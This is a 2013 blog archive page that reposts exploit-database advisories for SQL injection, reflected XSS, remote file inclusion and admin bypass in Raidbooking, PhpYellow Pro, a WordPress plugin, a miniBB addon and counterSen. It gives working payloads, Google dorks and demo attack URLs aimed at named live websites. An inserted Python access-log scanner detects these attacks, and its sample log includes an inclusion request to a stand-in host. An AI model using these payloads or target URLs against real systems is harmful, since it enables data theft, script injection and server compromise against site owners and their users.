Archive for 27 January 2013

Raidbooking v.1.1 Sql Injection Vulnerability

An SQL injection vulnerability has been found in Raidbooking v.1.1; I have previously explained what can be done with SQL injection vulnerabilities.
The location of the vulnerability and the exploit for it:

[+]~P0c : 
localhost/raid.php?id=1
 
[+]~Examples:
http://mossraid.wz.cz//raid.php?id=1%27
http://wow.boule.cz/raids/raid.php?id=1%27
http://www.fredzy.fr/WOW/raid_CP/raid.php?id=1%27%22
 
(---|~DzMafia~|---)
We Are : PassWord | BackUp | Gel-dz | EliteTrojan | Lakamora | JIGsaw | Evil-Dz
 
fb.me/AlgerianMafia
fb.me/elitetrojan
 
# 01EF407405E52197   1337day.com [2013-01-27]   C1B5F30A00438C37 #

PhpYellow Pro Edition XSS/SQL Injection Vulnerabilities

XSS and SQL injection vulnerabilities have been found in PhpYellow Pro Edition.
The vulnerability allows information to be retrieved from the MySQL database, and the XSS vulnerabilities allow malicious code to be executed.
Exploit for the vulnerability:

##########################################
# Exploit Title: PhpYellow Pro Edition XSS/SQL Injection Vulnerabilities
# Date: 2013-1-27
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database 
# Software Link: http://phpyellow.com/
# Category: webapps/php
# Price: $499.95
# Google dork: inurl:"/search/search4needles.php"
##########################################
 
# Error Based SQL Injection:
-Exploit-
http://site/directory/search/search4needles.php?search=subindex&haystack=[error-based injection]&needle=1
-Demo-
http://phpyellow.com/directory/search/search4needles.php?search=subindex&haystack=(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)x)&needle=1
 
# Reflected XSS:
-Demo-
http://phpyellow.com/directory/search/alpha_cat.php?L="><script>alert(1)</script>
http://phpyellow.com/directory/modules/popular_cities/scripts/city.php?city="><script>alert(2)</script>
http://phpyellow.com/directory/search/search4needles.php?search=top+cities&haystack="><script>alert(3)</script>
http://phpyellow.com/directory/profile.php?listing_property=8&profile_item="><script>alert(4)</script>
http://phpyellow.com/directory/search/search_advanced.php?search="><script>alert(5)</script>
 
# BECC55EC920E93FC   1337day.com [2013-01-27]   214750033779CE53 #
 

WordPress Dynamic Font Replacement 1.3 plugin SQL Injection Vulnerability

An SQL injection vulnerability has been found in the WordPress Dynamic Font Replacement 1.3 plugin. The vulnerability allows table contents to be read from the MySQL database, and the hashes of the server admin and users can be obtained.
The location of the vulnerability and the exploit for it:

# Exploit Title: WordPress Dynamic Font Replacement 1.3 plugin SQL Injection Vulnerability 
# Date: 2013-01-27
# Author: bd0rk
# Software Link: http://downloads.wordpress.org/plugin/dynamic-font-replacement-4wp.zip
# Version: 1.3 EN
# Category: web applications
# Google dork: n/a -->script-kiddieprotected
# Tested on: Windows and Ubuntu-Linux
 
----------------------------------------------------------------------------
 
Vulnerable code in file /admin/listings.php
 
SQL Injection Parameter: 'id'
 
[+]spl0iT: http://[target]/wp-content/plugins/dynamic-font-replacement-4wp/admin/listings.php?id=[SQLInjection-Code]
 
----------------------------------------------------------------------------
 
Greetings from cold Germany, bd0rk.
 
==> REST IN PEACE AARON SWARTZ <==
 
# 14670541C658329E   1337day.com [2013-01-27]   E83548C9685E497D #

miniBB 3.x Addon preview Remote File Include Vulnerability

A Remote File Include (RFI) vulnerability has been found in the miniBB 3.x Addon preview; the flaw in the script makes it possible to connect to the server remotely, open a back connect from the server, and run malicious code.

# Exploit Title: miniBB 3.x Addon preview Remote File Include Vulnerability
# Date: 2013-01-27
# Author: bd0rk
# Vendor or Software Link: http://www.minibb.com/download.php?file=minibb_plugin_preview
# Version: for miniBB 3.x
# Category: web applications
# Google dork: n/a -->script-kiddieprotected
# Tested on: Ubuntu-Linux
 
------------------------------------------------------------------------
 
I found vulnerable code in file addon_preview.php line: 12
 
So an attacker can use it to compromise the system.
 
Not declared before &require parameter is: $pathToFiles
------------------------------------------------------------------------
[+]spl0iT: http://[target]/[dir]/addon_preview.php?pathToFiles=[SHELL]
------------------------------------------------------------------------
 
Greetings from cold Germany, bd0rk.
 
==> REST IN PEACE AARON SWARTZ <==
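
Added example, not part of the advisories or of the affected projects: a log-hunting script that checks web access logs for requests to the injection points named in the Raidbooking, PhpYellow, Dynamic Font Replacement and miniBB advisories above. The log lines, the `files.example.test` host and the regex heuristics are constructed for this example, and it assumes both `id` parameters are integers.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

NON_NUMERIC = re.compile(r"\D")  # assumption: both id parameters are integers
SQL_WORDS = re.compile(r"\bselect\b.+\bfrom\b|\bunion\b.+\bselect\b|information_schema", re.I | re.S)
MARKUP = re.compile(r"<\s*script|[\"']\s*>", re.I)  # script tag or attribute break-out
ANY = re.compile(r"")  # pathToFiles is an internal variable: flag any supplied value

RULES = {  # (script, parameter) -> checks, taken from the advisories on this page
    ("raid.php", "id"): [("sqli", NON_NUMERIC)],
    ("listings.php", "id"): [("sqli", NON_NUMERIC)],
    ("search4needles.php", "haystack"): [("sqli", SQL_WORDS), ("xss", MARKUP)],
    ("alpha_cat.php", "L"): [("xss", MARKUP)],
    ("city.php", "city"): [("xss", MARKUP)],
    ("profile.php", "profile_item"): [("xss", MARKUP)],
    ("search_advanced.php", "search"): [("xss", MARKUP)],
    ("addon_preview.php", "pathToFiles"): [("rfi", ANY)],
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Return sorted (script, parameter, label) hits for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    hits = set()
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded payloads
        for label, pattern in RULES.get((script, name), []):
            if pattern.search(value):
                hits.add((script, name, label))
    return sorted(hits)

def scan_log(lines):
    """Return {line_number: hits} for the lines that matched a rule."""
    return {n: h for n, line in enumerate(lines, 1) if (h := scan_line(line))}

SAMPLE_LOG = [  # constructed lines with documentation addresses, not real traffic
    '203.0.113.5 - - [27/Jan/2013:10:00:01 +0000] "GET /raid.php?id=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [27/Jan/2013:10:00:02 +0000] "GET /raid.php?id=1%27 HTTP/1.1" 200 90',
    '203.0.113.9 - - [27/Jan/2013:10:00:03 +0000] "GET /directory/search/alpha_cat.php'
    '?L=%2522%253E%253Cscript%253Ealert(1)%253C/script%253E HTTP/1.1" 200 700',
    '203.0.113.9 - - [27/Jan/2013:10:00:04 +0000] "GET /forum/addon_preview.php'
    '?pathToFiles=http://files.example.test/a.txt HTTP/1.1" 200 15',
]

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

The `haystack` rule is a keyword heuristic and will miss obfuscated SQL; the integer check on `id` and the any-value check on `pathToFiles` are allow-list style and do not depend on the payload.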
 

counterSen 1.1.0 Admin Bypass Vulnerability

An admin bypass vulnerability has been found in counterSen 1.1.0; the location of the vulnerability and the download address of the affected script are given below.

=> counterSen 1.1.0 Admin Bypass Vulnerability
 
=> Discovered by: bd0rk
 
=> Contact: bd0rk[at]hackermail.com
 
=> Greetz: exploit-db.com, zone-h.org, Mandy, rgod, 1930
 
=> Affected Software: counterSen 1.1.0
 
=> Vendor: http://www.sensiebels.de/
 
=> DownloaD: http://www.sensiebels.de/download/download.php?id=countersen&fn=countersen&ex=zip
 
TESTED ON: Ubuntu-Linux
 
------------------------------------------------------
Exploit: http://[y0uRh0sT]/countersen/admin/index.php
------------------------------------------------------
 
 
The 24-year-old German hacker bd0rk <---white-hat 🙂
 
SpecialComment: NO WAR AROUND THE WORLD!
 
# A1D391B6E56CDFB7   1337day.com [2013-01-27]   000D280754EED474 #